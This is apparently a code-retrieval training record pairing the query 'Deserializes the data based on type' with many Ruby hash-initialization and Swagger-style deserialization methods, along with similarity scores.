"def initialize (hash)\n @name = hash [:name]\n @color = hash [:color]\n @robots = hash [:robots]\n @moon_count = hash [:moon_count]\n @cats = hash [:cats]\n #@solar_rotation = solar_rotation .....I dont really understand what a solar rotation is.... it's confusing.....\n @distance_from_the_sun = hash [:distance_from_the_sun]\n end",
"def initialize(hash = nil)\n @arguments = 0\n return if hash.nil?\n @name = hash['name']\n @arguments = hash['arguments']\n end",
"def _from_hash(hsh)\n hsh.each do |k, v|\n v = restore_hash(v)\n v = v.map { |iv| restore_hash(iv) } if v.is_a?(Array)\n send(:\"#{k}=\", v)\n end\n self\n end",
"def from_hash(hash)\n struct = SparkleStruct.new\n struct._camel_keys_set(:auto_discovery)\n struct._load(hash)\n struct._camel_keys_set(nil)\n struct\n end",
"def from_hash(hash)\n struct = SparkleStruct.new\n struct._camel_keys_set(:auto_discovery)\n struct._load(hash)\n struct._camel_keys_set(nil)\n struct\n end",
"def initialize(hash={})\n self.attributes = hash\n end",
"def initialize(raw_hash)\n if valid_hash?(raw_hash)\n self.replace(raw_hash)\n @version, @cost, @salt, @checksum = split_hash(self)\n else\n raise Errors::InvalidHash.new(\"invalid hash\")\n end\n end",
"def initialize(raw_hash)\n if valid_hash?(raw_hash)\n self.replace(raw_hash)\n @version, @cost, @salt, @checksum = split_hash(self)\n else\n raise Errors::InvalidHash.new(\"invalid hash\")\n end\n end",
"def build(base, object, type = nil, selected_fields = nil)\n return object unless object.is_a?(Hash)\n if _loading?\n Factory.from_db(klass, object, nil, selected_fields)\n else\n Factory.build(klass, object)\n end\n end",
"def initialize(hash)\n super(hash)\n @size = hash[\"size\"]\n end",
"def initialize(raw_hash)\n if valid_hash?(raw_hash)\n self.replace(raw_hash)\n @cost, @salt, @digest = split_hash(self.to_s)\n else\n raise Errors::InvalidHash.new(\"invalid hash\")\n end\n end",
"def instantiate hash, extra_attributes={}\n return hash unless hash.kind_of? Hash\n# init = hash.values_at(*@singulars).compact.first\n init = hash[@singular]\n inits = hash[@plural]\n if init\n new init.merge extra_attributes\n elsif inits\n inits.map {|each| new each.merge extra_attributes}\n else\n hash\n end\n end",
"def from_hash(values)\n @data_object.team_challenge = values['team_challenge']\n @data_object.team_level = values['team_level']\n @data_object.team_name = values['team_name']\n\n# @mgr_email = values['mgr_email']\n\n names = values['tm_name']\n\n TeamMember::MEMBERS_PER_TEAM.times do |i|\n if names[i].empty?\n @members[i].clear\n else\n @members[i].tm_name = names[i]\n @members[i].tm_grade = values['tm_grade'][i].to_i\n @members[i].tm_dob_mon = values['tm_dob_mon'][i]\n @members[i].tm_dob_day = values['tm_dob_day'][i]\n @members[i].tm_dob_year = values['tm_dob_year'][i]\n @members[i].tm_sex = values['tm_sex'][i]\n end\n end\n end",
"def hash\n { hash: @hash, hashType: @hash_type }\n end",
"def initialize(raw_hash)\n raise Errors::InvalidHash, 'invalid hash' unless valid_hash?(raw_hash)\n\n replace(raw_hash)\n\n @cost, @salt, @digest = split_hash(to_s)\n end",
"def initialize( confighash={} )\n\t\tihash = internify_keys( untaint_values(confighash) )\n\t\tmergedhash = DEFAULTS.merge( ihash, &HashMergeFunction )\n\n\t\t@struct = ConfigStruct.new( mergedhash )\n\t\t@create_time = Time.now\n\t\t@name = nil\n\t\t@loader = nil\n\n\t\tsuper()\n\tend",
"def initialize(*args)\n @hash = HashWithIndifferentAccess.new(*args)\n end",
"def create(hash={})\n model = self.new(hash)\n model.save\n model\n end",
"def from_hash(hash:, klass:)\n validate_class_kit(klass)\n\n @hash_helper.indifferent!(hash)\n entity = klass.new\n attributes = @attribute_helper.get_attributes(klass)\n attributes.each do |attribute|\n key = attribute[:name]\n type = attribute[:type]\n\n #if the hash value is nil skip it\n next if hash[key].nil?\n\n value = if is_class_kit?(type)\n from_hash(hash: hash[key], klass: type)\n elsif type == Array\n hash[key].map do |array_element|\n if attribute[:collection_type].nil?\n array_element\n else\n if is_class_kit?(attribute[:collection_type])\n from_hash(hash: array_element, klass: attribute[:collection_type])\n else\n @value_helper.parse(type: attribute[:collection_type], value: array_element)\n end\n end\n end\n else\n hash[key]\n end\n\n entity.public_send(:\"#{key}=\", value)\n end\n\n entity\n end",
"def from_h(hash, converter = nil)\n instance = new\n\n hash.each do |k, v|\n v = convert(v, k, converter) if converter\n instance.instance_variable_set(:\"@#{k}\", v)\n end\n\n instance\n end",
"def initialize(hash_that_represents_json)\n\t\t@data = hash_that_represents_json\n\tend",
"def hash_for_merging(hash)\n new_hash = { id: hash['message_id'].to_i,\n date: Time.at(hash['date'].to_i),\n from: User.new(hash['from'], @bot),\n chat: Chat.new(hash['chat'], @bot) }\n\n type = TYPES.find { |t| hash[t.to_s] }\n new_hash[type] = hash[type.to_s] # TODO: fail if type not found\n\n new_hash\n end",
"def initialize(hash)\n @header = Msg::Header.new(hash)\n @body = Msg::Body.new(content_is_json?, hash)\n end",
"def build_resource(hash = {})\n self.resource = resource_class.new(hash)\n end",
"def initialize()\n @hash = {}\n @values = []\n end",
"def build\n fail \"Please provide a value for key, currently: #{key}\" if key.nil?\n\n if in_key\n { in_key.to_sym => { key => data } }\n else\n process_data\n transform_to_hash\n end\n end",
"def initialize(build)\n @build = build\n @hash = {}\n @already_run = []\n end",
"def new_from_hash_marketplace(h)\n self.url = h\n h=h.split('/')\n h=h[h.size-2]\n self.original_id = h\n return self\n end",
"def initialize(hash, type, dump)\n self.hash = hash\n self.type = type.to_sym\n self.dump = dump\n end",
"def initialize(hash_data, opts: {})\n @hsh = hash_data\n @opts = opts\n\n @title = @hsh[:title]\n @body = @hsh[:body_hash]\n end",
"def initialize(hash)\n @color = hash[:color]\n @scent = hash[:scent]\n end",
"def initialize(hash = nil)\n hash.each { |key, value| self[key] = value } if !hash.nil? && hash.is_a?(Hash)\n end",
"def create(hash)\n NotImplementedError\n end",
"def from_h(hash, converter = nil)\n instance = new\n\n hash.each do |k, v|\n v = instance.convert(v, k, converter) if converter\n instance.send(:\"#{k}=\", v)\n end\n\n instance\n end",
"def init_jaxb_json_hash(_o)\n super _o\n @id = String.from_json(_o['id']) unless _o['id'].nil?\n @version = String.from_json(_o['version']) unless _o['version'].nil?\n @description = String.from_json(_o['description']) unless _o['description'].nil?\n @url = String.from_json(_o['url']) unless _o['url'].nil?\n @name = String.from_json(_o['name']) unless _o['name'].nil?\n @organization = Org::Apache::Archiva::Metadata::Model::Organization.from_json(_o['organization']) unless _o['organization'].nil?\n @issueManagement = Org::Apache::Archiva::Metadata::Model::IssueManagement.from_json(_o['issueManagement']) unless _o['issueManagement'].nil?\n @scm = Org::Apache::Archiva::Metadata::Model::Scm.from_json(_o['scm']) unless _o['scm'].nil?\n @ciManagement = Org::Apache::Archiva::Metadata::Model::CiManagement.from_json(_o['ciManagement']) unless _o['ciManagement'].nil?\n if !_o['licenses'].nil?\n @licenses = Array.new\n _oa = _o['licenses']\n _oa.each { | _item | @licenses.push Org::Apache::Archiva::Metadata::Model::License.from_json(_item) }\n end\n if !_o['mailingLists'].nil?\n @mailingLists = Array.new\n _oa = _o['mailingLists']\n _oa.each { | _item | @mailingLists.push Org::Apache::Archiva::Metadata::Model::MailingList.from_json(_item) }\n end\n if !_o['dependencies'].nil?\n @dependencies = Array.new\n _oa = _o['dependencies']\n _oa.each { | _item | @dependencies.push Org::Apache::Archiva::Metadata::Model::Dependency.from_json(_item) }\n end\n @incomplete = Boolean.from_json(_o['incomplete']) unless _o['incomplete'].nil?\n end",
"def create_version_hash\n new_version = {}\n new_version['created'] = ''\n new_version['message'] = ''\n new_version['user'] = {}\n # user is #name, # address.\n new_version['user']['name'] = ''\n new_version['user']['address'] = ''\n new_version['state'] = {}\n new_version\n end",
"def create_from_hash hash\n values = values_from_hash hash\n unless obj = find(:first, :conditions => values)\n return nil if values[:id]\n obj = create!(values)\n raise ArgumentError, \"#{obj.errors.to_s}\" unless obj.errors.empty?\n end\n obj\n end",
"def initialize result_hash={}\n @result_hash = result_hash\n end",
"def create_hash(&block); end",
"def create_hash(&block); end",
"def initialize(attrs={})\n from_hash(attrs)\n end",
"def build_request_data(hash)\n {\n :attributes! => {\n addressinfo: { \"xsi:type\" => \"ns2:Map\" },\n },\n username: @username,\n password: @password,\n addressinfo: {\n item: [\n { key: 'name', value: hash[:name] },\n { key: 'address1', value: hash[:address1] },\n { key: 'address2', value: hash[:address2] },\n { key: 'city', value: hash[:city] },\n { key: 'state', value: hash[:state] },\n { key: 'zip', value: hash[:zip] },\n { key: 'fflno', value: hash[:fflno] },\n { key: 'fflexp', value: hash[:fflexp] }\n ]\n },\n testing: @testing\n }\n end",
"def init_jaxb_json_hash(_o)\n @groupId = String.from_json(_o['groupId']) unless _o['groupId'].nil?\n @artifactId = String.from_json(_o['artifactId']) unless _o['artifactId'].nil?\n @version = String.from_json(_o['version']) unless _o['version'].nil?\n @packaging = String.from_json(_o['packaging']) unless _o['packaging'].nil?\n @className = String.from_json(_o['className']) unless _o['className'].nil?\n if !_o['repositories'].nil?\n @repositories = Array.new\n _oa = _o['repositories']\n _oa.each { | _item | @repositories.push String.from_json(_item) }\n end\n @bundleVersion = String.from_json(_o['bundleVersion']) unless _o['bundleVersion'].nil?\n @bundleSymbolicName = String.from_json(_o['bundleSymbolicName']) unless _o['bundleSymbolicName'].nil?\n @bundleExportPackage = String.from_json(_o['bundleExportPackage']) unless _o['bundleExportPackage'].nil?\n @bundleExportService = String.from_json(_o['bundleExportService']) unless _o['bundleExportService'].nil?\n @classifier = String.from_json(_o['classifier']) unless _o['classifier'].nil?\n @includePomArtifacts = Boolean.from_json(_o['includePomArtifacts']) unless _o['includePomArtifacts'].nil?\n @queryTerms = String.from_json(_o['queryTerms']) unless _o['queryTerms'].nil?\n @bundleImportPackage = String.from_json(_o['bundleImportPackage']) unless _o['bundleImportPackage'].nil?\n @bundleRequireBundle = String.from_json(_o['bundleRequireBundle']) unless _o['bundleRequireBundle'].nil?\n @pageSize = Fixnum.from_json(_o['pageSize']) unless _o['pageSize'].nil?\n @selectedPage = Fixnum.from_json(_o['selectedPage']) unless _o['selectedPage'].nil?\n end",
"def initialize(order_hash)\n @id = order_hash['id']\n @number = order_hash['number']\n @special_instructions = order_hash['special_instructions']\n @total = order_hash['total']\n @total_quantity = order_hash['total_quantity']\n @created_at = order_hash['created_at']\n @updated_at = order_hash['updated_at']\n end",
"def from_db_hash *args\n from_hash *args\n end",
"def build_from_hash(attributes)\n return nil unless attributes.is_a?(Hash)\n self.class.swagger_types.each_pair do |key, type|\n if type =~ /^Array<(.*)>/i\n if attributes[self.class.attribute_map[key]].is_a?(Array)\n self.send(\"#{key}=\", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )\n else\n #TODO show warning in debug mode\n end\n elsif !attributes[self.class.attribute_map[key]].nil?\n self.send(\"#{key}=\", _deserialize(type, attributes[self.class.attribute_map[key]]))\n else\n # data not found in attributes(hash), not an issue as the data can be optional\n end\n end\n\n self\n end",
"def build_from_hash(attributes)\n return nil unless attributes.is_a?(Hash)\n self.class.swagger_types.each_pair do |key, type|\n if type =~ /^Array<(.*)>/i\n if attributes[self.class.attribute_map[key]].is_a?(Array)\n self.send(\"#{key}=\", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )\n else\n #TODO show warning in debug mode\n end\n elsif !attributes[self.class.attribute_map[key]].nil?\n self.send(\"#{key}=\", _deserialize(type, attributes[self.class.attribute_map[key]]))\n else\n # data not found in attributes(hash), not an issue as the data can be optional\n end\n end\n\n self\n end",
"def build_from_hash(attributes)\n return nil unless attributes.is_a?(Hash)\n self.class.swagger_types.each_pair do |key, type|\n if type =~ /^Array<(.*)>/i\n if attributes[self.class.attribute_map[key]].is_a?(Array)\n self.send(\"#{key}=\", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )\n else\n #TODO show warning in debug mode\n end\n elsif !attributes[self.class.attribute_map[key]].nil?\n self.send(\"#{key}=\", _deserialize(type, attributes[self.class.attribute_map[key]]))\n else\n # data not found in attributes(hash), not an issue as the data can be optional\n end\n end\n\n self\n end"
] |
[
"0.8011074",
"0.7470833",
"0.7457607",
"0.7256629",
"0.72455454",
"0.70060325",
"0.6973257",
"0.6955014",
"0.69459796",
"0.69398683",
"0.69363195",
"0.6917627",
"0.6872358",
"0.6796184",
"0.6783521",
"0.67575246",
"0.67575246",
"0.67560464",
"0.67514306",
"0.67136854",
"0.66667664",
"0.6623634",
"0.661206",
"0.66098964",
"0.66098964",
"0.6591922",
"0.65713006",
"0.6547411",
"0.6524743",
"0.6524143",
"0.6513636",
"0.650189",
"0.6498057",
"0.6485853",
"0.6483371",
"0.6475685",
"0.6459916",
"0.6454491",
"0.6440182",
"0.6434778",
"0.6401363",
"0.63977015",
"0.6396885",
"0.63910425",
"0.63720834",
"0.6363958",
"0.63597506",
"0.6313429",
"0.6295958",
"0.62923384",
"0.62915224",
"0.62704456",
"0.62703115",
"0.62622243",
"0.62515473",
"0.6249854",
"0.6242987",
"0.6242987",
"0.62426233",
"0.62408733",
"0.62407595",
"0.62321323",
"0.62298346",
"0.622897",
"0.622756",
"0.62245685",
"0.62217826",
"0.6218501",
"0.6210329",
"0.62091905",
"0.620342",
"0.6201614",
"0.6178616",
"0.6166234",
"0.61611027",
"0.6140086",
"0.6126761",
"0.61154264",
"0.61059844",
"0.60980254",
"0.60971874",
"0.6090533",
"0.6064119",
"0.6061236",
"0.6060324",
"0.60599816",
"0.60420287",
"0.6039776",
"0.603712",
"0.6033585",
"0.6030829",
"0.6023582",
"0.6023582",
"0.6016123",
"0.60155296",
"0.6014705",
"0.6008574",
"0.60031897",
"0.60024095",
"0.60024095",
"0.60024095"
] |
0.0
|
-1
|
Deserializes the data based on type
|
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = Marketcheck_api_sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Telstra_Messaging.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = FattureInCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = IFClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = WineShipping.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
